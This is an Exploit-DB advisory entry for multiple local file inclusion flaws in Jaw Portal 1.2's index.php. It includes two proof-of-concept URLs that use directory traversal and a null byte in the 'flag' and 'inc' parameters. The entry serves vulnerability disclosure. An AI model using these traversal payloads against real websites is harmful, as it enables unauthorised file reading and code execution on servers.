Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusions

EDB-ID:

32351

CVE:

N/A


Author:

SirGod

Type:

webapps


Platform:

PHP

Date:

2008-09-10


source: https://www.securityfocus.com/bid/31099/info

Jaw Portal is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities using directory-traversal strings to execute arbitrary local PHP scripts within the context of the webserver process.

Jaw Portal 1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?flag=../../../autoexec.bat%00
http://www.example.com/index.php?inc=../../../autoexec.bat%00